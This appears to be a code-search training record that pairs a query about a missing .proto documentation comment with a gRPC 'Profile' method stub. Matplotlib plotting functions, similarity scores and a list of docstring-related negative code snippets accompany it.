alpha=1,\n edgecolor=\"white\", facecolor=\"white\")\n\n fig.set_facecolor('black')\n ax.set_facecolor('black')\n ax.grid(False)\n ax.w_xaxis.pane.fill = False\n ax.w_yaxis.pane.fill = False\n ax.w_zaxis.pane.fill = False\n\n ax.set_xlabel('Width', c='white')\n ax.set_ylabel('Depth', c='white')\n ax.set_zlabel('Height', c='white')\n\n plt.show()", "def parameter_compare(regressions,colors=['m','c'],upper_q=75,lower_q=25,ci_alpha = 0.2, bound_alpha = 0.0,\n labels = None,vertical_bbox_position = 1.4,width = 6,height = 5,draw_samples=True,num_samples =500):\n\n assert type(regressions) is dict\n \n # If no labels are provided, we take them from 
the first DynamicRegression object\n if labels is None:\n labels = regressions[regressions.keys()[0]].predictor_columns\n \n # this is the number of subplots in this figure\n n_predictors = regressions[regressions.keys()[0]].design.shape[1]\n figure, axes = plt.subplots(n_predictors,figsize = (width,height),sharex=True)\n \n for i,key in enumerate(regressions.keys()):\n \n if draw_samples:\n samples = regressions[key].ffbs.backward_sample(num_samples = num_samples)\n else:\n samples = regressions[key].ffbs.theta\n x = regressions[key].design.index\n \n for j in range(n_predictors):\n \n # Calculate and plot the confidence interval plus median\n lower = np.percentile(samples[:,j,:],lower_q,axis=1)\n upper = np.percentile(samples[:,j,:],upper_q,axis=1)\n median = np.percentile(samples[:,j,:],50,axis=1)\n axes[j].fill_between(x,upper,lower,color=colors[i],alpha = ci_alpha,\n label = '{0}%-{1}% range for {2}'.format(lower_q,upper_q,key))\n axes[j].plot(x,lower,color=colors[i],linestyle='--',alpha = bound_alpha)\n axes[j].plot(x,upper,color=colors[i],linestyle='--',alpha = bound_alpha)\n axes[j].plot(x,median,color=colors[i])\n axes[j].tick_params(direction = 'in')\n\n # a twin axis is made so we can label it easily on the right hand side of the plot\n twin = plt.twinx(axes[j])\n twin.set_ylabel(labels[j])\n \n # hide the tick labels and ticks because we only want the axis label\n twin.set_yticks([])\n \n axes[0].legend(ncol=len(list(regressions.keys())),bbox_to_anchor=(1.00, vertical_bbox_position), borderaxespad=0.,frameon=True,edgecolor='k',fancybox=False)\n return figure", "def plot(nSamples, expectations, variances, exactE, exactVar, title=\"\"):\n fig, axes = plt.subplots(2, 1)\n\n axes[0].semilogx(nSamples, expectations, color=\"black\", label=\"Empirical E(X)\")\n axes[0].axhline(exactE, color=\"darkgray\", label=\"Exact E(X)\")\n\n axes[1].semilogx(nSamples, variances, color=\"black\", label=\"Empirical Var(X)\")\n axes[1].axhline(exactVar, color=\"darkgray\", label=\"Exact Var(X)\")\n\n for ax in axes:\n ax.set_xlabel(\"N draws in the simulation\")\n ax.legend()\n axes[0].set_ylabel(\"E(X)\")\n axes[0].set_title(title)\n axes[1].set_ylabel(\"Var(X)\")\n plt.show()", "def train_test_error(e_train, e_test, model_params):\n\n fig = plt.figure(figsize=FIG_SIZE)\n plt.plot(model_params, e_train, label='Training Set')\n plt.plot(model_params, e_train, label='Test Set')\n plt.xlabel('Model Parameter')\n plt.ylabel('MSE of model')\n plt.legend()\n\n return fig", "def plot_rank_sensitivity(\n dmd_train_error, dmd_test_error, optdmd_train_error, optdmd_test_error\n):\n\n # Generate figure.\n fig, axes = plt.subplots(\n 1, 2, figsize=(fig_width, fig_width / 4), sharex=True, sharey=True\n )\n\n # Misc.\n rank = np.arange(1, dmd_test_error.shape[0] + 1)\n\n #####\n # TRAINING ERROR\n #####\n\n # Plot the vanilla DMD error.\n axes[0].plot(rank, dmd_train_error)\n # Plot the OptDMD error.\n axes[0].plot(rank, optdmd_train_error, ls=\"--\")\n # Add decorators.\n axes[0].set(\n xlabel=r\"Rank of the DMD model\",\n ylabel=r\"Normalized error\",\n title=r\"Training dataset\",\n )\n axes[0].grid(True)\n\n #####\n # TESTING ERROR\n #####\n\n # Plot the vanilla DMD error.\n axes[1].plot(rank, np.mean(dmd_test_error, axis=1), label=r\"Regular DMD\")\n axes[1].fill_between(\n rank,\n np.mean(dmd_test_error, axis=1) + np.std(dmd_test_error, axis=1),\n np.mean(dmd_test_error, axis=1) - np.std(dmd_test_error, axis=1),\n alpha=0.25,\n )\n # Plot the OptDMD error.\n axes[1].plot(\n rank, 
np.mean(optdmd_test_error, axis=1), ls=\"--\", label=r\"Optimal DMD\"\n )\n axes[1].fill_between(\n rank,\n np.mean(optdmd_test_error, axis=1) + np.std(optdmd_test_error, axis=1),\n np.mean(optdmd_test_error, axis=1) - np.std(optdmd_test_error, axis=1),\n alpha=0.25,\n )\n # Add decorators.\n axes[1].set(\n xlim=(0, rank.max()),\n xlabel=r\"Rank of the DMD model\",\n ylim=(0, 1),\n title=r\"Testing dataset\",\n )\n axes[1].grid(True)\n axes[1].legend(loc=0)\n\n return", "def true_vs_estimated(theta_true, theta_est, param_names, figsize=(8, 4), show=True, filename=None, font_size=12):\n\n # Plot settings\n plt.rcParams['font.size'] = font_size\n\n # Determine n_subplots dynamically\n n_row = int(np.ceil(len(param_names) / 6))\n n_col = int(np.ceil(len(param_names) / n_row))\n\n # Initialize figure\n f, axarr = plt.subplots(n_row, n_col, figsize=figsize)\n if n_row > 1:\n axarr = axarr.flat\n \n # --- Plot true vs estimated posterior means on a single row --- #\n for j in range(len(param_names)):\n \n # Plot analytic vs estimated\n axarr[j].scatter(theta_est[:, j], theta_true[:, j], color='black', alpha=0.4)\n \n # get axis limits and set equal x and y limits\n lower_lim = min(axarr[j].get_xlim()[0], axarr[j].get_ylim()[0])\n upper_lim = max(axarr[j].get_xlim()[1], axarr[j].get_ylim()[1])\n axarr[j].set_xlim((lower_lim, upper_lim))\n axarr[j].set_ylim((lower_lim, upper_lim))\n axarr[j].plot(axarr[j].get_xlim(), axarr[j].get_xlim(), '--', color='black')\n \n # Compute NRMSE\n rmse = np.sqrt(np.mean( (theta_est[:, j] - theta_true[:, j])**2 ))\n nrmse = rmse / (theta_true[:, j].max() - theta_true[:, j].min())\n axarr[j].text(0.1, 0.9, 'NRMSE={:.3f}'.format(nrmse),\n horizontalalignment='left',\n verticalalignment='center',\n transform=axarr[j].transAxes,\n size=12)\n \n # Compute R2\n r2 = r2_score(theta_true[:, j], theta_est[:, j])\n axarr[j].text(0.1, 0.8, '$R^2$={:.3f}'.format(r2),\n horizontalalignment='left',\n verticalalignment='center',\n transform=axarr[j].transAxes, \n size=12)\n \n if j == 0:\n # Label plot\n axarr[j].set_xlabel('Estimated')\n axarr[j].set_ylabel('True')\n axarr[j].set_title(param_names[j])\n axarr[j].spines['right'].set_visible(False)\n axarr[j].spines['top'].set_visible(False)\n \n # Adjust spaces\n f.tight_layout()\n if show:\n plt.show()\n # Save if specified\n if filename is not None:\n f.savefig(\"figures/{}_metrics.png\".format(filename), dpi=600, bbox_inches='tight')\n return f", "def generate_plots(fixed, moving, warped, flows, train_loss, val_loss, reg_loss, epoch):\n moving = moving.detach().cpu().numpy()\n fixed = fixed.detach().cpu().numpy()\n warped = [w.detach().cpu().numpy() for w in warped]\n flows = [f.detach().cpu().numpy() for f in flows]\n\n fig = plt.figure(constrained_layout=True, figsize=(4 * 5, 4 * 3))\n ax_dict = fig.subplot_mosaic(\"\"\"\n FABCD\n LGHIE\n MKJWX\n \"\"\")\n\n ax_dict['F'].imshow(moving[0, 0, ...], cmap='gray')\n ax_dict['F'].set_title('Moving')\n\n ax_dict['W'].imshow(fixed[0, 0, ...], cmap='gray')\n ax_dict['W'].set_title('Fixed')\n\n for i, ax_name in enumerate(list(\"ABCDEX\")):\n ax_dict[ax_name].imshow(warped[i][0, 0, ...], cmap='gray')\n if ax_name == \"A\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n ax_dict['L'].plot(train_loss, color='red', label='train_loss')\n ax_dict['L'].plot(val_loss, label='val_loss', color='blue')\n ax_dict['L'].plot(reg_loss, label='train_reg_loss', color='green')\n ax_dict['L'].set_title(\"Losses\")\n ax_dict['L'].grid()\n 
ax_dict['L'].set_xlim(0, args.e)\n ax_dict['L'].legend(loc='upper right')\n ax_dict['L'].scatter(len(train_loss) - 1, train_loss[-1], s=20, color='red')\n ax_dict['L'].scatter(len(val_loss) - 1, val_loss[-1], s=20, color='blue')\n ax_dict['L'].scatter(len(reg_loss) - 1, reg_loss[-1], s=20, color='green')\n\n for i, ax_name in enumerate(list(\"GHIJKM\")):\n plot_grid(ax_dict[ax_name], flows[i][0, ...])\n if ax_name == \"G\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n plt.suptitle(f\"Epoch {epoch}\")\n plt.savefig(f'./ckp/visualization/epoch_{epoch}.png')", "def show_test_results(true_labels: List[int], predictions: List[int], class_names: List[str]):\n confusion_mtx = confusion_matrix(true_labels, predictions)\n plt.figure(figsize=(10, 8))\n sns.heatmap(confusion_mtx, xticklabels=class_names, yticklabels=class_names,\n annot=True, fmt='g')\n plt.xlabel('Prediction')\n plt.ylabel('Label')\n plt.title(\"Confusion matrix\")\n plt.show()\n print(classification_report(true_labels, predictions, target_names=class_names, digits=DIGITS))", "def partial_dependence_plot(model, data, important_labels, feature_names):\n n_plots_per_row = 3\n n_plots = ceil(important_labels.shape[0] / n_plots_per_row)\n\n for plot_index, x_index in enumerate(important_labels, 1):\n target = X_train[:, x_index]\n unique_target = np.unique(target)\n n_unique = unique_target.shape[0]\n\n is_categorical = n_unique == 2\n if is_categorical:\n x_points = unique_target\n y_points = np.zeros_like(unique_target)\n else:\n # for numeric values, generate a fix number of values\n # in between the min and max value of the target column\n n_points = min(n_unique, 50)\n x_points = np.linspace(np.min(target), np.max(target), n_points)\n y_points = np.zeros_like(x_points)\n\n for i in range(x_points.shape[0]):\n x_data = data.copy()\n x_data[:, x_index] = x_points[i]\n y_pred = model.predict(x_data)\n y_points[i] = np.mean(y_pred)\n\n plt.subplot(n_plots, n_plots_per_row, plot_index)\n if is_categorical:\n plt.bar(x_points, y_points)\n else:\n plt.plot(x_points, y_points)\n\n plt.title(feature_names[x_index])\n\n plt.tight_layout()\n plt.show()", "def actvspred(modelname, predmodel):\n predscores, actualscores, meanerr, rmsqerr = predmodel\n plt.figure()\n plt.scatter(actualscores,predscores,s=70)\n x = np.array(range(100))\n plt.plot(x,x,'g',label='optimal model')\n # make regression\n rob.globalenv[\"pred\"] = FV(predscores)\n rob.globalenv[\"act\"] = FV(actualscores)\n mult_lm = stats.lm(\"pred ~ act + 1\")\n coeffs = np.array(mult_lm.rx(\"coefficients\")[0])\n rsqrd = base.summary(mult_lm).rx(\"r.squared\")[0][0]\n y = coeffs[1]*x+coeffs[0]\n plt.plot(x,y,'k',label='our model',linewidth=2)\n plt.xlabel(\"actual lsas delta\")\n plt.ylabel(\"predicted lsas delta\")\n plt.title(modelname)\n plt.axis([0,100,0,100])\n axes = plt.axes()\n axes.grid(b=True)\n axes.text(0.05,0.8,\"meanerr: %.2f\\nrmse: %.2f\\nr: %.2f (Rsqrd: %.2f)\"%(meanerr,rmsqerr,np.sqrt(rsqrd),rsqrd),transform=axes.transAxes)\n #plt.legend()\n plt.savefig(os.path.join(outdir,\"%s_crossval.png\"%modelname),dpi=300,format=\"png\")", "def plot_train_test_data(train, test):\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.spy(train, precision=0.01, markersize=0.5)\n ax1.set_xlabel(\"Users\")\n ax1.set_ylabel(\"Items\")\n ax1.set_title(\"Training data\")\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.spy(test, precision=0.01, markersize=0.5)\n ax2.set_xlabel(\"Users\")\n ax2.set_ylabel(\"Items\")\n 
ax2.set_title(\"Test data\")\n plt.tight_layout()\n plt.savefig(\"train_test\")\n plt.show()" ]
[ "0.7095982", "0.7095982", "0.6836742", "0.6829876", "0.6635602", "0.6579234", "0.6553575", "0.65293133", "0.6511318", "0.64920896", "0.6491192", "0.6463729", "0.6444954", "0.64443487", "0.6430439", "0.6392063", "0.6367903", "0.635039", "0.6348396", "0.63420445", "0.6334286", "0.6328053", "0.623977", "0.62203723", "0.6194698", "0.6145043", "0.6139883", "0.61329883", "0.61315995", "0.61252916", "0.6120382", "0.61133194", "0.6109218", "0.6105611", "0.60996616", "0.60910857", "0.60847884", "0.608436", "0.607955", "0.60725933", "0.60577077", "0.60547733", "0.6053747", "0.60466623", "0.60415685", "0.60255975", "0.6024758", "0.6021", "0.60125065", "0.6005277", "0.6003386", "0.599986", "0.599127", "0.5966957", "0.5963656", "0.59545326", "0.59474075", "0.59425414", "0.5936344", "0.5931039", "0.59240127", "0.5920911", "0.5907627", "0.59038377", "0.5881447", "0.58653474", "0.5859206", "0.5853379", "0.58417296", "0.5832073", "0.58277565", "0.58218414", "0.58165604", "0.58139724", "0.5806851", "0.5799951", "0.57987064", "0.5783701", "0.57745296", "0.5772322", "0.57713604", "0.5767007", "0.5749034", "0.57385594", "0.5738232", "0.5736593", "0.5726125", "0.5715036", "0.5711925", "0.57116365", "0.57083285", "0.5699618", "0.5697638", "0.56945467", "0.5694475", "0.5693291", "0.5692672", "0.5688889", "0.5688073", "0.56818587" ]
0.6863375
2
Missing associated documentation comment in .proto file.
def Profile(self, request, context):
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n 
self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n 
self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def __init__(self, proto):\n self.proto = proto", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. 
I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = 
CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6347405", "0.62316597", "0.62253404", "0.6107218", "0.60712713", "0.6055634", "0.60191995", "0.5996731", "0.597168", "0.59466904", "0.59434444", "0.59335643", "0.5919223", "0.5902901", "0.58987755", "0.5864407", "0.5856765", "0.5836615", "0.57913834", "0.57687634", "0.5763714", "0.57372254", "0.5724019", "0.5721367", "0.57097507", "0.5693322", "0.5633919", "0.5631681", "0.5627807", "0.56277686", "0.5608027", "0.55785465", "0.5573401", "0.55674845", "0.55551904", "0.5549059", "0.553947", "0.5534518", "0.5531683", "0.55310714", "0.55151445", "0.55110514", "0.5500249", "0.5493004", "0.548441", "0.5478941", "0.5474353", "0.5463836", "0.5458455", "0.5458455", "0.5458455", "0.5452267", "0.54450864", "0.54251957", "0.5421046", "0.5412398", "0.5397417", "0.5395437", "0.5393102", "0.5386761", "0.53758156", "0.5353344", "0.53435314", "0.5338307", "0.5337008", "0.53325796", "0.53264475", "0.5325588", "0.5324948", "0.5321367", "0.53188294", "0.5317395", "0.5313514", "0.5306335", "0.52826846", "0.526687", "0.5262916", "0.5252228", "0.52204585", "0.52173424", "0.52134776", "0.5213095", "0.5209492", "0.52052844", "0.5204341", "0.51928616", "0.51881623", "0.5186641", "0.51833606", "0.5181922", "0.51770014", "0.51718605", "0.5163659", "0.5162326", "0.5162326", 